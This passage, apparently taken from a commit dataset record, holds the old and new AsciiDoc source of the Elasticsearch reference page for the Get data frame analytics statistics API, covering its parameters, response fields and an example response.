(#60737)\n\n","repos":"scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/ml\/df-analytics\/apis\/get-dfanalytics-stats.asciidoc","new_file":"docs\/reference\/ml\/df-analytics\/apis\/get-dfanalytics-stats.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"platinum\"]\n[[get-dfanalytics-stats]]\n= Get {dfanalytics-jobs} statistics API\n[subs=\"attributes\"]\n++++\n<titleabbrev>Get {dfanalytics-jobs} stats<\/titleabbrev>\n++++\n\nRetrieves usage information for {dfanalytics-jobs}.\n\nexperimental[]\n\n[[ml-get-dfanalytics-stats-request]]\n== {api-request-title}\n\n`GET _ml\/data_frame\/analytics\/<data_frame_analytics_id>\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/<data_frame_analytics_id>,<data_frame_analytics_id>\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/_all\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/*\/_stats`\n\n\n[[ml-get-dfanalytics-stats-prereq]]\n== {api-prereq-title}\n\nIf the {es} {security-features} are enabled, you must have the following \nprivileges:\n\n* cluster: `monitor_ml`\n \nFor more information, see <<security-privileges>> and {ml-docs-setup-privileges}.\n\n[[ml-get-dfanalytics-stats-path-params]]\n== {api-path-parms-title}\n\n`<data_frame_analytics_id>`::\n(Optional, string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default]\n\n\n[[ml-get-dfanalytics-stats-query-params]]\n== {api-query-parms-title}\n\n`allow_no_match`::\n(Optional, boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=allow-no-match]\n\n`from`::\n(Optional, integer) \ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=from]\n\n`size`::\n(Optional, integer) \ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=size]\n\n`verbose`::\n(Optional, boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=verbose]\n\n[role=\"child_attributes\"]\n[[ml-get-dfanalytics-stats-response-body]]\n== {api-response-body-title}\n\n`data_frame_analytics`::\n(array)\nAn array of objects that contain usage information for {dfanalytics-jobs}, which\nare sorted by the `id` value in ascending order.\n+\n.Properties of {dfanalytics-job} usage resources\n[%collapsible%open]\n====\n\/\/Begin analysis_stats\n`analysis_stats`:::\n(object)\nAn object containing information about the analysis job.\n+\n.Properties of `analysis_stats`\n[%collapsible%open]\n=====\n\/\/Begin classification_stats\n`classification_stats`::::\n(object)\nAn object containing information about the {classanalysis} job.\n+\n.Properties of `classification_stats`\n[%collapsible%open]\n======\n\/\/Begin class_hyperparameters\n`hyperparameters`::::\n(object)\nAn object containing the parameters of the {classanalysis} job.\n+\n.Properties of `hyperparameters`\n[%collapsible%open]\n=======\n`alpha`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-alpha]\n\n`class_assignment_objective`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=class-assignment-objective]\n\n`downsample_factor`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-downsample-factor]\n\n`eta`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`eta_growth_rate_per_tree`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-eta-growth]\n\n`feature_bag_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_attempts_to_add_tree`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-attempts]\n\n`max_optimization_rounds_per_hyperparameter`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-optimization-rounds]\n\n`max_trees`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_folds`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-folds]\n\n`num_splits_per_feature`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-splits]\n\n`soft_tree_depth_limit`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-limit]\n\n`soft_tree_depth_tolerance`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-tolerance]\n=======\n\/\/End class_hyperparameters\n\n`iteration`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-iteration]\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin class_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Properties of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n\n`iteration_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-iteration]\n=======\n\/\/End class_timing_stats\n\n\/\/Begin class_validation_loss\n`validation_loss`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss]\n+\n.Properties of `validation_loss`\n[%collapsible%open]\n=======\n`fold_values`::::\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-fold]\n\n`loss_type`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-type]\n=======\n\/\/End class_validation_loss\n======\n\/\/End classification_stats\n\n\/\/Begin outlier_detection_stats\n`outlier_detection_stats`::::\n(object)\nAn object containing information about the {oldetection} job.\n+\n.Properties of `outlier_detection_stats`\n[%collapsible%open]\n======\n\/\/Begin parameters\n`parameters`::::\n(object)\nThe list of job parameters specified by the user or determined by algorithmic \nheuristics.\n+\n.Properties of `parameters`\n[%collapsible%open]\n=======\n`compute_feature_influence`::::\n(boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=compute-feature-influence]\n\n`feature_influence_threshold`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-influence-threshold]\n\n`method`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=method]\n\n`n_neighbors`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=n-neighbors]\n\n`outlier_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=outlier-fraction]\n\n`standardization_enabled`::::\n(boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=standardization-enabled]\n=======\n\/\/End parameters\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin od_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Property of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n=======\n\/\/End od_timing_stats\n======\n\/\/End outlier_detection_stats\n\n\/\/Begin regression_stats\n`regression_stats`::::\n(object)\nAn object containing information about the {reganalysis} job.\n+\n.Properties of `regression_stats`\n[%collapsible%open]\n======\n\/\/Begin reg_hyperparameters\n`hyperparameters`::::\n(object)\nAn object containing the parameters of the {reganalysis} job.\n+\n.Properties of `hyperparameters`\n[%collapsible%open]\n=======\n`alpha`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-alpha]\n\n`downsample_factor`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-downsample-factor]\n\n`eta`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`eta_growth_rate_per_tree`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-eta-growth]\n\n`feature_bag_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_attempts_to_add_tree`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-attempts]\n\n`max_optimization_rounds_per_hyperparameter`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-optimization-rounds]\n\n`max_trees`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_folds`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-folds]\n\n`num_splits_per_feature`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-splits]\n\n`soft_tree_depth_limit`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-limit]\n\n`soft_tree_depth_tolerance`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-tolerance]\n=======\n\/\/End reg_hyperparameters\n\n`iteration`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-iteration]\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin reg_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Propertis of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n\n`iteration_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-iteration]\n=======\n\/\/End reg_timing_stats\n\n\/\/Begin reg_validation_loss\n`validation_loss`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss]\n+\n.Properties of `validation_loss`\n[%collapsible%open]\n=======\n`fold_values`::::\n(array of strings)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-fold]\n\n`loss_type`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-type]\n=======\n\/\/End reg_validation_loss\n======\n\/\/End regression_stats\n=====\n\/\/End analysis_stats\n\n`assignment_explanation`:::\n(string)\nFor running jobs only, contains messages relating to the selection of a node to \nrun the job.\n\n\/\/Begin data_counts\n`data_counts`:::\n(object)\nAn object that provides counts for the quantity of documents skipped, used in\ntraining, or available for testing.\n+\n.Properties of `data_counts`\n[%collapsible%open]\n=====\n`skipped_docs_count`::::\n(integer)\nThe number of documents that are skipped during the analysis because they \ncontained values that are not supported by the analysis. For example, \n{oldetection} does not support missing fields so it skips documents with missing \nfields. Likewise, all types of analysis skip documents that contain arrays with \nmore than one element.\n\n`test_docs_count`::::\n(integer)\nThe number of documents that are not used for training the model and can be used \nfor testing.\n\n`training_docs_count`::::\n(integer)\nThe number of documents that are used for training the model.\n=====\n\/\/End data_counts\n\n`id`:::\n(string)\nThe unique identifier of the {dfanalytics-job}.\n\n`memory_usage`:::\n(Optional, object)\nAn object describing memory usage of the analytics. It is present only after the \njob is started and memory usage is reported.\n+\n.Properties of `memory_usage`\n[%collapsible%open]\n=====\n`memory_reestimate_bytes`::::\n(long)\nThis value is present when the `status` is `hard_limit` and it\nis a new estimate of how much memory the job needs.\n\n`peak_usage_bytes`::::\n(long)\nThe number of bytes used at the highest peak of memory usage.\n\n`status`::::\n(string)\nThe memory usage status. May have one of the following values:\n+\n--\n* `ok`: usage stayed below the limit.\n* `hard_limit`: usage surpassed the configured memory limit.\n--\n\n`timestamp`::::\n(date)\nThe timestamp when memory usage was calculated.\n=====\n\n`node`:::\n(object)\nContains properties for the node that runs the job. This information is \navailable only for running jobs.\n+\n.Properties of `node`\n[%collapsible%open]\n=====\n`attributes`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-attributes]\n\n`ephemeral_id`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-ephemeral-id]\n\n`id`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-id]\n\n`name`::::\n(string)\nThe node name.\n\n`transport_address`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-transport-address]\n=====\n\n`progress`:::\n(array) The progress report of the {dfanalytics-job} by phase.\n+\n.Properties of phase objects\n[%collapsible%open]\n=====\n`phase`::::\n(string) Defines the phase of the {dfanalytics-job}. Possible phases: \n* `reindexing`, \n* `loading_data`, \n* `computing_outliers` (for {oldetection} only),\n* `feature_selection` (for {regression} and {classification} only),\n* `coarse_parameter_search` (for {regression} and {classification} only),\n* `fine_tuning_parameters` (for {regression} and {classification} only),\n* `final_training` (for {regression} and {classification} only),\n* `writing_results`,\n* `inference` (for {regression} and {classification} only).\n+\nTo learn more about the different phases, refer to\n{ml-docs}\/ml-dfa-phases.html[How a {dfanalytics} job works].\n \n`progress_percent`::::\n(integer) The progress that the {dfanalytics-job} has made expressed in \npercentage.\n=====\n\n`state`:::\n(string) The status of the {dfanalytics-job}, which can be one of the following\nvalues: `analyzing`, `failed`, `reindexing`, `started`, `starting`,`stopping`, \n`stopped`.\n====\n\/\/End of data_frame_analytics\n\n\n[[ml-get-dfanalytics-stats-response-codes]]\n== {api-response-codes-title}\n\n`404` (Missing resources)::\n If `allow_no_match` is `false`, this code indicates that there are no\n resources that match the request or only partial matches for the request.\n\n\n[[ml-get-dfanalytics-stats-example]]\n== {api-examples-title}\n\nThe following API retrieves usage information for the\n{ml-docs}\/ecommerce-outliers.html[{oldetection} {dfanalytics-job} example]:\n\n[source,console]\n--------------------------------------------------\nGET _ml\/data_frame\/analytics\/ecommerce\/_stats\n--------------------------------------------------\n\/\/ TEST[skip:Kibana sample data]\n\n[source,console-result]\n----\n{\n \"count\" : 1,\n \"data_frame_analytics\" : [\n {\n \"id\" : \"ecommerce\",\n \"state\" : \"stopped\",\n \"progress\" : [\n {\n \"phase\" : \"reindexing\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"loading_data\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"analyzing\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"writing_results\",\n \"progress_percent\" : 100\n }\n ],\n \"data_counts\" : {\n \"training_docs_count\" : 3321,\n \"test_docs_count\" : 0,\n \"skipped_docs_count\" : 0\n },\n \"memory_usage\" : {\n \"timestamp\" : 1586905058000,\n \"peak_usage_bytes\" : 279484\n },\n \"analysis_stats\" : {\n \"outlier_detection_stats\" : {\n \"timestamp\" : 1586905058000,\n \"parameters\" : {\n \"n_neighbors\" : 0,\n \"method\" : \"ensemble\",\n \"compute_feature_influence\" : true,\n \"feature_influence_threshold\" : 0.1,\n \"outlier_fraction\" : 0.05,\n \"standardization_enabled\" : true\n },\n \"timing_stats\" : {\n \"elapsed_time\" : 245\n }\n }\n }\n }\n ]\n}\n----\n","old_contents":"[role=\"xpack\"]\n[testenv=\"platinum\"]\n[[get-dfanalytics-stats]]\n= Get {dfanalytics-jobs} statistics API\n[subs=\"attributes\"]\n++++\n<titleabbrev>Get {dfanalytics-jobs} stats<\/titleabbrev>\n++++\n\nRetrieves usage information for {dfanalytics-jobs}.\n\nexperimental[]\n\n[[ml-get-dfanalytics-stats-request]]\n== {api-request-title}\n\n`GET _ml\/data_frame\/analytics\/<data_frame_analytics_id>\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/<data_frame_analytics_id>,<data_frame_analytics_id>\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/_all\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/*\/_stats`\n\n\n[[ml-get-dfanalytics-stats-prereq]]\n== {api-prereq-title}\n\nIf the {es} {security-features} are enabled, you must have the following \nprivileges:\n\n* cluster: `monitor_ml`\n \nFor more information, see <<security-privileges>> and {ml-docs-setup-privileges}.\n\n[[ml-get-dfanalytics-stats-path-params]]\n== {api-path-parms-title}\n\n`<data_frame_analytics_id>`::\n(Optional, string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default]\n\n\n[[ml-get-dfanalytics-stats-query-params]]\n== {api-query-parms-title}\n\n`allow_no_match`::\n(Optional, boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=allow-no-match]\n\n`from`::\n(Optional, integer) \ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=from]\n\n`size`::\n(Optional, integer) \ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=size]\n\n`verbose`::\n(Optional, boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=verbose]\n\n[role=\"child_attributes\"]\n[[ml-get-dfanalytics-stats-response-body]]\n== {api-response-body-title}\n\n`data_frame_analytics`::\n(array)\nAn array of objects that contain usage information for {dfanalytics-jobs}, which\nare sorted by the `id` value in ascending order.\n+\n.Properties of {dfanalytics-job} usage resources\n[%collapsible%open]\n====\n\/\/Begin analysis_stats\n`analysis_stats`:::\n(object)\nAn object containing information about the analysis job.\n+\n.Properties of `analysis_stats`\n[%collapsible%open]\n=====\n\/\/Begin classification_stats\n`classification_stats`::::\n(object)\nAn object containing information about the {classanalysis} job.\n+\n.Properties of `classification_stats`\n[%collapsible%open]\n======\n\/\/Begin class_hyperparameters\n`hyperparameters`::::\n(object)\nAn object containing the parameters of the {classanalysis} job.\n+\n.Properties of `hyperparameters`\n[%collapsible%open]\n=======\n`alpha`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-alpha]\n\n`class_assignment_objective`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=class-assignment-objective]\n\n`downsample_factor`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-downsample-factor]\n\n`eta`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`eta_growth_rate_per_tree`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-eta-growth]\n\n`feature_bag_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_attempts_to_add_tree`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-attempts]\n\n`max_optimization_rounds_per_hyperparameter`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-optimization-rounds]\n\n`max_trees`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_folds`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-folds]\n\n`num_splits_per_feature`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-splits]\n\n`soft_tree_depth_limit`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-limit]\n\n`soft_tree_depth_tolerance`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-tolerance]\n=======\n\/\/End class_hyperparameters\n\n`iteration`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-iteration]\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin class_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Properties of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n\n`iteration_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-iteration]\n=======\n\/\/End class_timing_stats\n\n\/\/Begin class_validation_loss\n`validation_loss`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss]\n+\n.Properties of `validation_loss`\n[%collapsible%open]\n=======\n`fold_values`::::\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-fold]\n\n`loss_type`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-type]\n=======\n\/\/End class_validation_loss\n======\n\/\/End classification_stats\n\n\/\/Begin outlier_detection_stats\n`outlier_detection_stats`::::\n(object)\nAn object containing information about the {oldetection} job.\n+\n.Properties of `outlier_detection_stats`\n[%collapsible%open]\n======\n\/\/Begin parameters\n`parameters`::::\n(object)\nThe list of job parameters specified by the user or determined by algorithmic \nheuristics.\n+\n.Properties of `parameters`\n[%collapsible%open]\n=======\n`compute_feature_influence`::::\n(boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=compute-feature-influence]\n\n`feature_influence_threshold`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-influence-threshold]\n\n`method`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=method]\n\n`n_neighbors`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=n-neighbors]\n\n`outlier_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=outlier-fraction]\n\n`standardization_enabled`::::\n(boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=standardization-enabled]\n=======\n\/\/End parameters\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin od_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Property of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n=======\n\/\/End od_timing_stats\n======\n\/\/End outlier_detection_stats\n\n\/\/Begin regression_stats\n`regression_stats`::::\n(object)\nAn object containing information about the {reganalysis} job.\n+\n.Properties of `regression_stats`\n[%collapsible%open]\n======\n\/\/Begin reg_hyperparameters\n`hyperparameters`::::\n(object)\nAn object containing the parameters of the {reganalysis} job.\n+\n.Properties of `hyperparameters`\n[%collapsible%open]\n=======\n`alpha`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-alpha]\n\n`downsample_factor`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-downsample-factor]\n\n`eta`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`eta_growth_rate_per_tree`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-eta-growth]\n\n`feature_bag_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_attempts_to_add_tree`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-attempts]\n\n`max_optimization_rounds_per_hyperparameter`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-optimization-rounds]\n\n`max_trees`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_folds`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-folds]\n\n`num_splits_per_feature`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-splits]\n\n`soft_tree_depth_limit`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-limit]\n\n`soft_tree_depth_tolerance`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-tolerance]\n=======\n\/\/End reg_hyperparameters\n\n`iteration`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-iteration]\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin reg_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Propertis of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n\n`iteration_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-iteration]\n=======\n\/\/End reg_timing_stats\n\n\/\/Begin reg_validation_loss\n`validation_loss`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss]\n+\n.Properties of `validation_loss`\n[%collapsible%open]\n=======\n`fold_values`::::\n(array of strings)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-fold]\n\n`loss_type`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-type]\n=======\n\/\/End reg_validation_loss\n======\n\/\/End regression_stats\n=====\n\/\/End analysis_stats\n\n`assignment_explanation`:::\n(string)\nFor running jobs only, contains messages relating to the selection of a node to \nrun the job.\n\n\/\/Begin data_counts\n`data_counts`:::\n(object)\nAn object that provides counts for the quantity of documents skipped, used in\ntraining, or available for testing.\n+\n.Properties of `data_counts`\n[%collapsible%open]\n=====\n`skipped_docs_count`::::\n(integer)\nThe number of documents that are skipped during the analysis because they \ncontained values that are not supported by the analysis. For example, \n{oldetection} does not support missing fields so it skips documents with missing \nfields. Likewise, all types of analysis skip documents that contain arrays with \nmore than one element.\n\n`test_docs_count`::::\n(integer)\nThe number of documents that are not used for training the model and can be used \nfor testing.\n\n`training_docs_count`::::\n(integer)\nThe number of documents that are used for training the model.\n=====\n\/\/End data_counts\n\n`id`:::\n(string)\nThe unique identifier of the {dfanalytics-job}.\n\n`memory_usage`:::\n(Optional, object)\nAn object describing memory usage of the analytics. It is present only after the \njob is started and memory usage is reported.\n+\n.Properties of `memory_usage`\n[%collapsible%open]\n=====\n`memory_reestimate_bytes`::::\n(long)\nThis value is present when the `status` is `hard_limit` and it\nis a new estimate of how much memory the job needs.\n\n`peak_usage_bytes`::::\n(long)\nThe number of bytes used at the highest peak of memory usage.\n\n`status`::::\n(string)\nThe memory usage status. May have one of the following values:\n+\n--\n* `ok`: usage stayed below the limit.\n* `hard_limit`: usage surpassed the configured memory limit.\n--\n\n`timestamp`::::\n(date)\nThe timestamp when memory usage was calculated.\n=====\n\n`node`:::\n(object)\nContains properties for the node that runs the job. This information is \navailable only for running jobs.\n+\n.Properties of 